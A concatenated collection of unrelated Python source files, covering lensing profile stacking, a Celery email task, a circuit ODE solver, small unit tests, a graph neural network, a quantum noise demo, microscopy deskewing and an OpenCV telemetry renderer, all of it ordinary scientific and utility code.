config['splittings'].iteritems(): for s in xrange(len(limit)-1): pnames.append("%s_%d" % (key, s)) profile = {} # each slice get a binned profile for all data and each jackknife region for pname in pnames: profile[pname] = [BinnedScalarProfile(bins) for i in xrange(n_jack + 1)] return profile # BinnedScalarProfile has a += operator, so we just have to call this for # each slices/jackknifed profile def appendToProfile(profile, profile_): for pname in profile.keys(): for i in xrange(len(profile[pname])): profile[pname][i] += profile_[pname][i] def insertIntoProfile(profile, pname, R, Q, W, S, region=-1, mask=None): if mask is None: for i in xrange(len(profile[pname])): if i != region: profile[pname][i].insert(R, Q, W, S=S) else: for i in xrange(len(profile[pname])): if i != region: if S is not None: profile[pname][i].insert(R[mask], Q[mask], W[mask], S=S[mask]) else: profile[pname][i].insert(R[mask], Q[mask], W[mask], S=S) def getShearValues(shapes_lens, lens, config): global wz1, wz2 # compute tangential shear gt = tangentialShear(shapes_lens[config['shape_ra_key']], shapes_lens[config['shape_dec_key']], getValues(shapes_lens, config['shape_e1_key'], config['functions']), getValues(shapes_lens, config['shape_e2_key'], config['functions']), lens[config['lens_ra_key']], lens[config['lens_dec_key']], computeB=False) # compute DeltaSigma from source redshift # we use DeltaSigma = wz2 * wz1**-1 < gt> / (wz2 <s>), # where wz1 and wz2 are the effective inverse Sigma_crit # weights at given lens z """W = getValues(shapes_lens, config['shape_weight_key'], config['functions']) z_l = getValues(lens, config['lens_z_key'], config['functions']) z_s = getValues(shapes_lens, config['shape_z_key'], config['functions']) Sigma_crit = getSigmaCrit(z_l, z_s) mask = z_s > z_l gt[mask] *= Sigma_crit[mask]**-1 W[mask] *= Sigma_crit[mask]**-2 W[mask == False] = 0 """ # compute sensitivity and weights: with the photo-z bins, # the precomputed wz1 already contains the measurement weights, # we just need to apply the effective Sigma_crit to gt and # replace W with wz1**2 (dropping the measurement weight which would otherwise # be counted twice). # See Sheldon et al., 2004, AJ, 127, 2544 (eq. 19) W = np.zeros(gt.size) # better safe than sorry zs_bin = getValues(shapes_lens, config['shape_z_key'], config['functions']) for b in np.unique(zs_bin): wz1_ = extrap(lens[config['lens_z_key']], wz1['z'], wz1['bin%d' % b]) mask = zs_bin == b gt[mask] /= wz1_ W[mask] = wz1_**2 S = getValues(shapes_lens, config['shape_sensitivity_key'], config['functions']) return gt, W, S def stackShapes(shapes, lenses, profile_type, config, regions): chunk_size = config['shape_chunk_size'] shapefile = config['shape_file'] thread_id = current_process()._identity basename = os.path.basename(shapefile) basename = ".".join(basename.split(".")[:-1]) matchfile = '/tmp/' + basename + '_matches_%d.bin' % thread_id # do we have the column for the quadrant check? do_quadrant_check = 'quad_flags' in lenses.dtype.names # find all galaxies in shape catalog within maxrange arcmin # of each lens center maxrange = float(config['maxrange']) if config['coords'] == "physical": maxrange = Dist2Ang(maxrange, lenses[config['lens_z_key']]) h = eu.htm.HTM(8) matchfile = matchfile.encode('ascii') # htm.match expects ascii filenames h.match(lenses[config['lens_ra_key']], lenses[config['lens_dec_key']], shapes[config['shape_ra_key']], shapes[config['shape_dec_key']], maxrange, maxmatch=-1, file=matchfile) htmf = HTMFile(matchfile) Nmatch = htmf.n_matches # profile container profile = createProfile(config) if Nmatch: # iterate over all lenses, write scalar value, r, weight into file for m1, m2, d12 in htmf.matches(): lens = lenses[m1] region = regions[m1] shapes_lens = shapes[m2] # check which sources around a lens we can use if do_quadrant_check: mask = getQuadrantMask(lens, shapes_lens, config) shapes_lens = shapes_lens[mask] d12 = np.array(d12)[mask] del mask n_gal = shapes_lens.size if n_gal: # define the profile quantities: radius, q, weight, sensitivity if config['coords'] == "physical": R = Ang2Dist(d12, lens[config['lens_z_key']]) else: R = np.array(d12) if profile_type == "scalar": Q = getValues(shapes_lens, config['shape_scalar_key'], config['functions']) W = getValues(shapes_lens, config['shape_weight_key'], config['functions']) S = None if profile_type == "shear": Q, W, S = getShearValues(shapes_lens, lens, config) # save unsliced profile first insertIntoProfile(profile, 'all', R, Q, W, S, region=region) # find out in which slice each pair falls for key, limit in config['splittings'].iteritems(): if config['split_type'] == 'shape': values = getValues(shapes_lens, key, config['functions']) for s in xrange(len(limit)-1): pname = "%s_%d" % (key, s) mask = getSliceMask(values, limit[s], limit[s+1]) insertIntoProfile(profile, pname, R, Q, W, S, region=region, mask=mask) del mask del values elif config['split_type'] == 'lens': value = getValues(lens, key, config['functions']) for s in xrange(len(limit)-1): pname = "%s_%d" % (key, s) # each lens can only be in one slice per key if getSliceMask(value, limit[s], limit[s+1]): mask = None insertIntoProfile(profile, pname, R, Q, W, S, region=region, mask=mask) break del shapes_lens, R, Q, W, S # finish up os.system('rm ' + matchfile) return profile def getJackknifeRegions(config, lenses, outdir): # if jacknife errors are desired: create jackknife regions from # the lens file by k-means clustering and assign each lens # to the nearest k-means center # If reuse_jack is specified: reload previously generated centers # to use fixed regions if config['n_jack']: n_jack = config['n_jack'] import kmeans_radec jack_file = outdir + "n_jack/km_centers.npy" radec = np.dstack((lenses[config['lens_ra_key']], lenses[config['lens_dec_key']]))[0] if not os.path.exists(jack_file): print "defining %d jackknife regions" % n_jack maxiter = 100 tol = 1.0e-5 km = kmeans_radec.kmeans_sample(radec, n_jack, maxiter=maxiter, tol=tol) if not km.converged: raise RuntimeError("k means did not converge") # save result for later try: os.makedirs(outdir + "n_jack") except OSError: pass np.save(jack_file, km.centers) else: print "reusing jackknife regions from " + jack_file centers_ = np.load(jack_file) km = kmeans_radec.KMeans(centers_) # define regions: ids of lenses assigned to each k-means cluster regions = km.find_nearest(radec) else: # do not use regions: -1 will never be selected for jackknifes regions = -1 * np.ones(len(lenses), dtype='int8') return regions def computeMeanStdForProfile(profile): n_jack = len(profile)-1 # use build-in method to calculate in-bin means and dispersions if n_jack == 0: mean_r, n, mean_q, std_q, sum_w = profile.getProfile() mask = (n>0) return {"mean_r": mean_r[mask], "n": n[mask], "mean_q": mean_q[mask], "std_q": std_q[mask], "sum_w": sum_w[mask]} else: # jackknife q = [] missing = [] for i in xrange(n_jack): r_, n_, q_, std_q, sum_w = profile[i].getProfile() missing.append(n_ == 0) q.append(q_) missing = np.array(missing) q = np.ma.masked_array(q, mask=missing) mean_q = q.mean(axis=0) # result for normal/non-jackknife profile mean_r, n, mean0, std_q, sum_w = profile[-1].getProfile() mask = (n>0) # variance and bias-corrected mean needs number of actual jackknifes: # to be corrected for available data in each radial bin n_avail = n_jack - missing.sum(axis=0) mean_q = n_avail*mean0 - (n_avail - 1)*mean_q std_q = ((n_avail - 1.)/n_avail * ((q - mean_q)**2).sum(axis=0))**0.5 return {"mean_r": mean_r[mask], "n": n[mask], "mean_q": mean_q.data[mask], "std_q": std_q.data[mask], "sum_w": sum_w[mask]} def collapseJackknifes(profile): for pname in profile.keys(): profile[pname] = computeMeanStdForProfile(profile[pname]) if __name__ == '__main__': # parse inputs try: configfile = argv[1] profile_type = argv[2] except IndexError: print "usage: " + argv[0] + " <config file> <shear/scalar>" raise SystemExit try: fp = open(configfile) print "opening configfile " + configfile config = json.load(fp) fp.close() except IOError: print "configfile " + configfile + " does not exist!" raise SystemExit if profile_type not in ['shear', 'scalar']: print "specify profile_type from ['shear', 'scalar']" raise SystemExit if config['coords'] not in ['angular', 'physical']: print "config: specify either 'angular' or 'physical' coordinates" raise SystemExit outdir = os.path.dirname(configfile) + "/" if profile_type == "shear": name = "shear_" if profile_type == "scalar": name = "scalar_" + config['shape_scalar_key'] + "_" profile_files = outdir + name + '*.npz' # only do something if there are no profiles present if len(glob(profile_files)) == 0: # open shape catalog shapes_all = getShapeCatalog(config, verbose=True) if shapes_all.size == 0: print "Shape catalog empty" raise SystemExit # open lens catalog lenses = getLensCatalog(config, verbose=True) if lenses.size == 0: print "Lens catalog empty" raise SystemExit # container to hold profiles profile = createProfile(config) # get the jackknife regions (if specified in config) regions = getJackknifeRegions(config, lenses, outdir) # load lensing weights (w * Sigma_crit ^-1 or -2) for shear profiles if profile_type == "shear": wz1 = getWZ(power=1) # cut into manageable junks and distribute over cpus print "running lens-source stacking ..." n_processes = cpu_count() pool = Pool(processes=n_processes) chunk_size = config['shape_chunk_size'] splits = len(shapes_all)/chunk_size if len(shapes_all) % chunk_size != 0: splits += 1 results = [pool.apply_async(stackShapes, (shapes_all[i*chunk_size: (i+1)*chunk_size], lenses, profile_type, config, regions)) for i in range(splits)] j = 0 for r in results: profile_ = r.get() appendToProfile(profile, profile_) r, n, mean_q, std_q, sum_w = profile['all'][-1].getProfile() print " job %d/%d (n_pairs = %.3fe9) done" % (j, splits, n.sum() / 1e9) j+=1 # save jackknife region results if config['n_jack']: print "saving jackknife profiles..." for pname in profile.keys(): for i in xrange(len(profile[pname])): filename = outdir + 'n_jack/' + name + pname + '_%d.npz' % i profile[pname][i].save(filename) # collapse jackknifes into means and stds print "aggregating results..." collapseJackknifes(profile) # save profiles for pname in profile.keys(): filename = outdir + name + pname + '.npz' print "writing " + filename np.savez(filename, **(profile[pname])) # print all profile to stdout p = profile['all'] print "\nALL profile:" print "{0:>8s} | {1:>12s} | {2:>12s} | {3:>12s} +- {4:>12s}".format("RADIUS", "NUMBER", "SUM(W)/AREA", "MEAN", "STD") print "-" * 70 for i in xrange(len(p['n'])): print "{0:8.2f} | {1:12g} | {2:12g} | {3:12g} +- {4:12g}".format(p['mean_r'][i], p['n'][i], p['sum_w'][i], p['mean_q'][i], p['std_q'][i]) else: print "Profiles " + profile_files + " already exist."
from simit_services.celery import app from django.core.mail import EmailMultiAlternatives from django.template.loader import render_to_string @app.task def asinc_mail(list_emails=[], subject='NO SUBJECT', template=None, content_data=None): sender = "SIMIT SERVICES <[email protected]>" merge_data = content_data text_body = render_to_string("../templates/"+template+".txt", merge_data) html_body = render_to_string("../templates/"+template+".html", merge_data) msg = EmailMultiAlternatives(subject=subject, from_email=sender, to=list_emails, body=text_body) msg.attach_alternative(html_body, "text/html") msg.send()
import numpy import matplotlib.pyplot as plt from decimal import Decimal from scipy import integrate from scipy.interpolate import InterpolatedUnivariateSpline # одномерная кусочно-линейная интерполяция функции, которая задана точками (xp, fp). # Table1 masI = [0.5, 1, 5, 10, 50, 200, 400, 800, 1200] masT0 = [6400, 6790, 7150, 7270, 8010, 9185, 10010, 11140, 12010] masm = [0.4, 0.55, 1.7, 3, 11, 32, 40, 41, 39] # Table2 masT = [4000, 5000, 6000, 7000, 8000, 9000, 10000, 11000, 12000, 13000, 14000] masSigm = [0.031, 0.27, 2.05, 6.06, 12.0, 19.9, 29.6, 41.1, 54.1, 67.7, 81.5] # x - t время # y - I ток # z - Uc напряжение # f - dI/dt # phi - dU/dt def interpolate(x, masX, masY): order = 1 s = InterpolatedUnivariateSpline(masX, masY, k=order) return float(s(x)) def T(z): return (Tw - T0) * z**m + T0 def sigma(T): return interpolate(T, masT, masSigm) def Rp(I): global m global T0 m = interpolate(I, masI, masm) T0 = interpolate(I, masI, masT0) def func(z): return sigma(T(z)) * z integral = integrate.quad(func, 0, 1) Rp = le/(2 * numpy.pi * R**2 * integral[0]) return Rp def f(xn, yn, zn): return -((Rk + m_Rp_global) * yn - zn)/Lk def phi(xn, yn, zn): return -yn/Ck def second_order(xn, yn, zn, hn, m_Rp): global m_Rp_global m_Rp_global = m_Rp alpha = 0.5 yn_1 = yn + hn * ((1 - alpha) * f(xn, yn, zn) + alpha * f(xn + hn/(2*alpha), yn + hn/(2*alpha) * f(xn, yn, zn), zn + hn/(2*alpha) * phi(xn, yn, zn))) zn_1 = zn + hn * ((1 - alpha) * phi(xn, yn, zn) + alpha * phi(xn + hn/(2*alpha), yn + hn/(2*alpha) * f(xn, yn, zn), zn + hn/(2*alpha) * phi(xn, yn, zn))) return yn_1, zn_1 def fourth_order(xn, yn, zn, hn, m_Rp): global m_Rp_global m_Rp_global = m_Rp k1 = hn * f(xn, yn, zn) q1 = hn * phi(xn, yn, zn) k2 = hn * f(xn + hn/2, yn + k1/2, zn + q1/2) q2 = hn * phi(xn + hn/2, yn + k1/2, zn + q1/2) k3 = hn * f(xn + hn/2, yn + k2/2, zn + q2/2) q3 = hn * phi(xn + hn/2, yn + k2/2, zn + q2/2) k4 = hn * f(xn + hn, yn + k3, zn + q3) q4 = hn * phi(xn + hn, yn + k3, zn + q3) yn_1 = yn + (k1 + 2*k2 + 2*k3 + k4)/6 zn_1 = zn + (q1 + 2*q2 + 2*q3 + q4)/6 return yn_1, zn_1 def do_plot(pltMasT, mas1, mas2, xlabel, ylabel, name1, name2): plt.plot(pltMasT, mas1) plt.plot(pltMasT, mas2) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.legend((name1, name2)) plt.grid(True) plt.show() if __name__ == "__main__": R = 0.35 Tw = 2000.0 Ck = 268e-6 Lk = 187e-6 Rk = 0.25 # от 0.5 до 200 Uc0 = 1400.0 I0 = 0.5 # от 0.5 до 3 le = 12.0 I4 = I0 Uc4 = Uc0 I2 = I0 Uc2 = Uc0 T0 = 0.0 m = 0.0 pltMasTzero = [] pltMasT = [] pltMasI4 = [] pltMasU4 = [] pltMasRp4 = [] pltMasI2 = [] pltMasU2 = [] pltMasRp2 = [] h = 1e-5 for t in numpy.arange(0, 0.0006, h): try: m_Rp4 = Rp(I4) m_Rp2 = Rp(I2) if t > h: pltMasT.append(t) pltMasTzero.append(T0) pltMasI4.append(I4) pltMasU4.append(Uc4) pltMasRp4.append(m_Rp4) pltMasI2.append(I2) pltMasU2.append(Uc2) pltMasRp2.append(m_Rp2) I4, Uc4 = fourth_order(t, I4, Uc4, h, m_Rp4) I2, Uc2 = second_order(t, I2, Uc2, h, m_Rp2) except: break do_plot(pltMasT, pltMasI4, pltMasI2, 't', 'I', '4th order', '2nd order') do_plot(pltMasT, pltMasU4, pltMasU2, 't', 'Uc', '4th order', '2nd order') do_plot(pltMasT, pltMasRp4, pltMasRp2, 't', 'Rp', '4th order', '2nd order') for i in range(len(pltMasI4)): pltMasI4[i] *= pltMasRp4[i] pltMasI2[i] *= pltMasRp2[i] do_plot(pltMasT, pltMasI4, pltMasI2, 't', 'Up', '4th order', '2nd order') do_plot(pltMasTzero, pltMasI4, pltMasI2, 't', 'T0', '4th order', '2nd order')
class DataRow(dict): """object for holding row of data""" def __init__(self, *args, **kwargs): """creates instance of DataRow""" super(DataRow, self).__init__(*args, **kwargs) self.target_table = None def row_values(self, field_names, default_value=None): """returns row value of specified field_names""" return tuple(self.get(field_name, default_value) for field_name in field_names) def set_target_table(self, target_table): """sets target table attribute""" self.target_table = target_table def get_target_table(self): """returns target table attribute""" return self.target_table class DataTable(object): """object for holding data""" def __init__(self, data, keys=None): """instantiates Table object with rows(which should be a list of dictionaries)""" self.rows = list(data) #set keys as _keys of first row by default if keys: self._keys = keys else: self._keys = list(self.rows[0].keys()) def keys(self): """returns keys of Table""" return self._keys def append_row(self, row): """adds another row to table""" self.rows.append(row) def iterrows(self, field_names, default_value=None): """generator that yields specified fields for each row""" for row in self.rows: yield tuple(row.get(field_name, default_value) for field_name in field_names)
import unittest from daps.utils.video import count_frames, duration, frame_rate class test_video(unittest.TestCase): def setUp(self): self.video = 'data/videos/example.mp4' self.video_dir = 'data/videos/example' def test_count_frames(self): filename = 'not_existent_video.avi' assert count_frames(filename) == 0 assert count_frames(self.video_dir, method='dir') == 1507 assert count_frames(self.video) == 1507 assert count_frames(self.video, 'ffprobe') == 1507 @unittest.skip("A contribution is required") def test_dump_frames(self): pass def test_duration(self): assert isinstance(duration(self.video), float) assert duration('nonexistent.video') == 0.0 @unittest.skip("A contribution is required") def get_clip(self): pass def test_frame_rate(self): assert isinstance(frame_rate(self.video), float) assert frame_rate('nonexistent.video') == 0.0
import numpy print("Hello World 4")
import torch.nn as nn import torch.nn.functional as F from torch.optim import Adam from torch_geometric.nn import GCNConv from datasets import get_planetoid_dataset class GCN(nn.Module): def __init__(self, dataset, nhid, dropout): super(GCN, self).__init__() self.gc1 = GCNConv(dataset.num_features, nhid) self.gc2 = GCNConv(nhid, dataset.num_classes) self.dropout = dropout def reset_parameters(self): self.gc1.reset_parameters() self.gc2.reset_parameters() def forward(self, data): x, edge_index = data.x, data.edge_index x = F.dropout(x, p=self.dropout, training=self.training) x = self.gc1(x, edge_index) x = F.relu(x) x = F.dropout(x, p=self.dropout, training=self.training) x = self.gc2(x, edge_index) return F.log_softmax(x, dim=1) def create_gcn_model(data_name, nhid=16, dropout=0.5, lr=0.01, weight_decay=5e-4): dataset = get_planetoid_dataset(data_name, True) model = GCN(dataset, nhid, dropout) optimizer = Adam(model.parameters(), lr=lr, weight_decay=weight_decay) return dataset, model, optimizer
# Copyright (c) Jupyter Development Team. # Distributed under the terms of the Modified BSD License. from traitlets import Bool, Tuple, List from .utils import setup, teardown from ..widget import Widget # A widget with simple traits class SimpleWidget(Widget): a = Bool().tag(sync=True) b = Tuple(Bool(), Bool(), Bool(), default_value=(False, False, False)).tag(sync=True) c = List(Bool()).tag(sync=True) def test_empty_send_state(): w = SimpleWidget() w.send_state([]) assert w.comm.messages == [] def test_empty_hold_sync(): w = SimpleWidget() with w.hold_sync(): pass assert w.comm.messages == []
""" probabilistic bit flip noise """ from qulacs import Observable from qulacs import QuantumState, QuantumCircuit from qulacs.gate import Probabilistic, X import matplotlib.pyplot as plt obs = Observable(1) obs.add_operator(1, "Z 0") state = QuantumState(1) circuit = QuantumCircuit(1) p = 0.1 # probability of bit flip n_circuit_sample = 10000 n_depth = 20 # the number of probabilistic gate probabilistic_pauli_gate = Probabilistic([p],[X(0)]) #define probabilistic gate circuit.add_gate(probabilistic_pauli_gate) # add the prob. gate to the circuit exp_array = [] for depth in range(n_depth): exp = 0 for i in [0]*n_circuit_sample: state.set_zero_state() for _ in range(depth): circuit.update_quantum_state(state) # apply the prob. gate exp += obs.get_expectation_value(state) # get expectation value for one sample of circuit exp /= n_circuit_sample # get overall average exp_array.append(exp) #plot plt.plot(range(n_depth), exp_array) plt.show()
import unittest from BaseTest import BaseTest class Test_goService(BaseTest): GO_SERVICE_URL = "http://localhost:3000/health" def test_goService(self): self.isBackendAlive(self.GO_SERVICE_URL, "go service") if __name__ == '__main__': unittest.main()
import math import numpy from dexp.utils import xpArray from dexp.utils.backends import Backend, NumpyBackend def yang_deskew( image: xpArray, depth_axis: int, lateral_axis: int, flip_depth_axis: bool, dx: float, dz: float, angle: float, camera_orientation: int = 0, num_split: int = 4, internal_dtype=None, ): """'Yang' Deskewing as done in Yang et al. 2019 ( https://www.biorxiv.org/content/10.1101/2020.09.22.309229v2 ) Parameters ---------- image : input image (skewed 3D stack) depth_axis : Depth axis. lateral_axis : Lateral axis. flip_depth_axis : Flips image to deskew in the opposite orientation (True for view 0 and False for view 1) dz : float, scanning step (stage or galvo scanning step, not the same as the distance between the slices) dx : float, pixel size of the camera angle : float, incident angle of the light sheet, angle between the light sheet and the optical axis in degrees camera_orientation : Camera orientation correction expressed as a number of 90 deg rotations to be performed per 2D image in stack. num_split : number of splits to break down the data into pieces (along y, axis=2) to fit into the memory of GPU internal_dtype : internal dtype to perform computation Returns ------- Deskewed image """ # compute dimensionless parameters: xres = dx * math.cos(angle * math.pi / 180) resample_factor = int(round(dz / xres)) lateral_scaling = xres / dx image = yang_deskew_dimensionless( image=image, depth_axis=depth_axis, lateral_axis=lateral_axis, flip_depth_axis=flip_depth_axis, resample_factor=resample_factor, lateral_scaling=lateral_scaling, camera_orientation=camera_orientation, num_split=num_split, internal_dtype=internal_dtype, ) return image def yang_deskew_dimensionless( image: xpArray, depth_axis: int, lateral_axis: int, flip_depth_axis: bool, resample_factor: int, lateral_scaling: float, camera_orientation: int = 0, num_split: int = 4, internal_dtype=None, ): """'Yang' Deskewing as done in Yang et al. 2019 ( https://www.biorxiv.org/content/10.1101/2020.09.22.309229v2 ) Parameters ---------- image : input image (skewed 3D stack) depth_axis : Depth axis. lateral_axis : Lateral axis. flip_depth_axis : Flips image to deskew in the opposite orientation (True for view 0 and False for view 1) resample_factor : Resampling factor lateral_scaling : Lateral scaling camera_orientation : Camera orientation correction expressed as a number of 90 deg rotations to be performed per 2D image in stack. num_split : number of splits to break down the data into pieces (along y, axis=2) to fit into the memory of GPU internal_dtype : internal dtype to perform computation Returns ------- Deskewed image """ # we don't want to move the image to the backend just now, # as it might be a very large image and we can actually defer moving it to the backend as # after splitting... xp = Backend.get_xp_module(image) # We save the original dtype: original_dtype = image.dtype # Default internal dtype is the same as the input image: if internal_dtype is None: internal_dtype = image.dtype # Numpy backend does not support float16: if type(Backend.current()) is NumpyBackend and internal_dtype == xp.float16: internal_dtype = xp.float32 # First we compute the permutation that will reorder the axis so that the depth and # lateral axis are the first axis in the image: permutation = (depth_axis, lateral_axis) + tuple( axis for axis in range(image.ndim) if axis not in [depth_axis, lateral_axis] ) permutation = numpy.asarray(permutation) inverse_permutation = numpy.argsort(permutation) # We apply the permutation: image = xp.transpose(image, axes=permutation) if flip_depth_axis: image = xp.flip(image, axis=0) # rotate the data # Note: the weird 1+co mod 4 is due to the fact that Bin's original # code was implemented for a different orientation... image = xp.rot90(image, k=(1 + camera_orientation) % 4, axes=(1, 2)) # deskew and rotate image = _resampling_vertical_split( image, resample_factor=resample_factor, lateral_scaling=lateral_scaling, num_split=num_split, internal_dtype=internal_dtype, ) # flip along axis x if flip_depth_axis: xp = Backend.get_xp_module(image) # _resampling_vertical_split transposes axis 0 with axis 2, so we flip along 2: image = xp.flip(image, axis=2) # We apply the inverse permutation: image = xp.transpose(image, axes=inverse_permutation) # Cast back to original dtype: image = image.astype(original_dtype, copy=False) return image def _resampling_vertical_split( image, resample_factor: int, lateral_scaling: float, num_split: int = 4, internal_dtype=None ): """Same as resampling_vertical but splits the input image so that computation can fit in GPU memory. Parameters ---------- image : input image (skewed 3D stack) resample_factor : Resampling factor lateral_scaling : Lateral scaling internal_dtype : internal dtype to perform computation Returns ------- Resampled image. Important note: for scalability reasons, the returned image is always numpy image. """ if num_split == 1: output = _resampling_vertical( image, resample_factor=resample_factor, lateral_scaling=lateral_scaling, internal_dtype=internal_dtype ) else: xp = Backend.get_xp_module(image) data_gpu_splits = xp.array_split(image, num_split, axis=1) data_cpu_splits = [] for k in range(num_split): data_resampled = _resampling_vertical( data_gpu_splits[k], resample_factor=resample_factor, lateral_scaling=lateral_scaling, internal_dtype=internal_dtype, ) data_cpu_splits.append(Backend.to_numpy(data_resampled, dtype=image.dtype)) output = numpy.concatenate(data_cpu_splits, axis=1) return output def _resampling_vertical(image, resample_factor: int, lateral_scaling: float, internal_dtype=None): """Resampling of the image by interpolation along vertical direction. Here we assume the dz is integer multiple of dx * cos(angle * pi / 180), one can also pre-interpolate the data within along the z' axis if this is not the case Parameters ---------- image : input image (skewed 3D stack) resample_factor : Resampling factor lateral_scaling : Lateral scaling internal_dtype : internal dtype to perform computation Returns ------- Resampled image """ xp = Backend.get_xp_module() sp = Backend.get_sp_module() # Move images to backend. image = Backend.to_backend(image, dtype=internal_dtype) (nz, ny, nx) = image.shape dtype = image.dtype nz_new, ny_new, nx_new = len(range(0, nx, resample_factor)), ny, nx + nz * resample_factor data_reassign = xp.zeros((nz_new, ny_new, nx_new), internal_dtype) for x in range(nx): x_start = x x_end = nz * resample_factor + x data_reassign[x // resample_factor, :, x_start:x_end:resample_factor] = image[:, :, x].T del image # rescale the data, interpolate along z data_rescale = sp.ndimage.zoom(data_reassign, zoom=(resample_factor, 1, 1), order=1) del data_reassign data_interp = xp.zeros((nz_new, ny_new, nx_new), dtype) for z in range(nz_new): for k in range(resample_factor): data_interp[z, :, k::resample_factor] = data_rescale[z * resample_factor - k, :, k::resample_factor] del data_rescale # rescale the data, to have voxel the same along x an y; # remove the first z slice which has artifacts due to resampling image_final = sp.ndimage.zoom(data_interp[1:], zoom=(1, 1, lateral_scaling), order=1) return image_final
import os import argparse import cv import sys global inputParser # just a reminder, it's used as a global variable global inputArgs # just a reminder, it's used as a global variable def parseInput() : global inputParser global inputArgs inputParser = argparse.ArgumentParser(description='Render telemetry (attitude) to video from Anemoi autopilot') inputParser.add_argument('sessionFolder', nargs=1, help='folder containing processed autopilot autopilot (30 FPS)') inputArgs = inputParser.parse_args() def processInput() : print inputArgs.sessionFolder scriptDir = os.path.dirname(os.path.abspath(__file__)) os.system("touch /run/shm/attitude2video_opencv.lock") data_yaw=[] data_pitch=[] data_roll=[] data_speed=[] data_altitude=[] data_climb=[] sourceFile_yaw = open(inputArgs.sessionFolder[0]+"/logs/interpolated_yaw_30fps.txt", 'r') for line in sourceFile_yaw : data_yaw.append(float(line)) sourceFile_yaw.close() sourceFile_pitch = open(inputArgs.sessionFolder[0]+"/logs/interpolated_pitch_30fps.txt", 'r') for line in sourceFile_pitch : data_pitch.append(float(line)) sourceFile_pitch.close() sourceFile_roll = open(inputArgs.sessionFolder[0]+"/logs/interpolated_roll_30fps.txt", 'r') for line in sourceFile_roll : data_roll.append(float(line)) sourceFile_roll.close() sourceFile_speed = open(inputArgs.sessionFolder[0]+"/logs/interpolated_speed_30fps.txt", 'r') for line in sourceFile_speed : data_speed.append(float(line)*3600/1000) sourceFile_speed.close() sourceFile_altitude = open(inputArgs.sessionFolder[0]+"/logs/interpolated_altitude_30fps.txt", 'r') for line in sourceFile_altitude : data_altitude.append(float(line)) sourceFile_altitude.close() sourceFile_climb = open(inputArgs.sessionFolder[0]+"/logs/interpolated_altitude_speed_30fps.txt", 'r') for line in sourceFile_climb : data_climb.append(float(line)) sourceFile_climb.close() # create working directory in shared memmory if not os.path.exists("/dev/shm/attitude2video_opencv") : os.makedirs("/dev/shm/attitude2video_opencv") # prepare image templates os.system("cp "+scriptDir+"/resources_opencv/speed.png /dev/shm/attitude2video_opencv/speed.png") os.system("cp "+scriptDir+"/resources_opencv/climb.png /dev/shm/attitude2video_opencv/climb.png") os.system("cp "+scriptDir+"/resources_opencv/center.png /dev/shm/attitude2video_opencv/center.png") os.system("cp "+scriptDir+"/resources_opencv/horizon.png /dev/shm/attitude2video_opencv/horizon.png") os.system("cp "+scriptDir+"/resources_opencv/terrain.png /dev/shm/attitude2video_opencv/terrain.png") os.system("cp "+scriptDir+"/resources_opencv/compass.png /dev/shm/attitude2video_opencv/compass.png") os.system("cp "+scriptDir+"/resources_opencv/altitude.png /dev/shm/attitude2video_opencv/altitude.png") os.system("cp "+scriptDir+"/resources_opencv/background.png /dev/shm/attitude2video_opencv/background.png") # create working directory if not os.path.exists(inputArgs.sessionFolder[0]+"/media/work") : os.makedirs(inputArgs.sessionFolder[0]+"/media/work") if not os.path.exists(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv") : os.makedirs(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv") ## Apptly named MAGIC # But before that, let's load the templates originalSpeed = cv.LoadImage("/dev/shm/attitude2video_opencv/speed.png") originalClimb = cv.LoadImage("/dev/shm/attitude2video_opencv/climb.png") originalCenter = cv.LoadImage("/dev/shm/attitude2video_opencv/center.png") originalHorizon = cv.LoadImage("/dev/shm/attitude2video_opencv/horizon.png") # -1 to load with alpha channel originalTerrain = cv.LoadImage("/dev/shm/attitude2video_opencv/terrain.png") originalCompass = cv.LoadImage("/dev/shm/attitude2video_opencv/compass.png") originalAltitude = cv.LoadImage("/dev/shm/attitude2video_opencv/altitude.png") for x in range(0, len(data_speed)): progressbar(((x*1.0+1)/len(data_speed)), "Rendering openCV:", "(" + str(x+1) + "/" + str(len(data_speed)) + ") " + "attitude_%07d.jpg" % (x+1), 20) #for x in range(0,1): currentSpeed = cv.CloneImage(originalSpeed) currentClimb = cv.CloneImage(originalClimb) currentCenter = cv.CloneImage(originalCenter) currentHorizon = cv.CloneImage(originalHorizon) currentTerrain = cv.CloneImage(originalTerrain) currentCompass = cv.CloneImage(originalCompass) currentAltitude = cv.CloneImage(originalAltitude) # 0 ------------------------------------------------ # Rotate center picCenter = (originalHorizon.width/2.0, originalHorizon.height/2.0) outputMatrix = cv.CreateMat(2, 3, cv.CV_32F) cv.GetRotationMatrix2D(picCenter , (data_roll[x]) , 1.0 , outputMatrix) # Positive number goes counter-clockwise, counter to what the original code did. Ergo, do * away with -1 cv.WarpAffine(originalHorizon, currentHorizon, outputMatrix, cv.CV_WARP_FILL_OUTLIERS+cv.CV_INTER_LINEAR, fillval=(0,0,0,0)) # Rotate horizon picCenter = (originalCenter.width/2.0, originalCenter.height/2.0) outputMatrix = cv.CreateMat(2, 3, cv.CV_32F) cv.GetRotationMatrix2D(picCenter , (data_roll[x]) , 1.0 , outputMatrix) cv.WarpAffine(originalCenter, currentCenter, outputMatrix, cv.CV_WARP_FILL_OUTLIERS+cv.CV_INTER_LINEAR, fillval=(0,0,0,0)) # 1 ------------------------------------------------ odmik = data_pitch[x]*3.0*-1.0 # Reverse it again. width = 640 height = 360 picCenter = (currentHorizon.width/2.0, currentHorizon.height/2.0); regionOfInterest = (int(picCenter[0]-(width/2.0)), int(picCenter[1]-(height/2.0)+(odmik)), int(width), int(height)) thirdHorizon = cv.GetSubRect(currentHorizon, regionOfInterest) # Instead of copy-ing we do subtraction. Works, since we're using (mostly) black for displaying things. Templates need to be alpha-less and inverted. cv.Sub(thirdHorizon, originalTerrain, thirdHorizon); cv.Sub(thirdHorizon, currentCenter, thirdHorizon); # 2 ------------------------------------------------ zacetnaPozicija = width/2.0; if data_yaw[x] <= 180: zacetnaPozicija = zacetnaPozicija + 3.9*data_yaw[x] else: zacetnaPozicija = zacetnaPozicija + 3.9*(360-data_yaw[x]) # Speed imporvement. Which isn't faster. Yay. compassHeight = 50 regionOfInterest = (int(currentCompass.width/2.0-zacetnaPozicija), int(0), int(width), int(compassHeight)) currentCompass = cv.GetSubRect(currentCompass, regionOfInterest) regionOfInterest = (int(0), int(0), int(width), int(compassHeight)) pointerToSpace = cv.GetSubRect(thirdHorizon, regionOfInterest) cv.Sub(pointerToSpace, currentCompass, pointerToSpace) # 3 ------------------------------------------------ 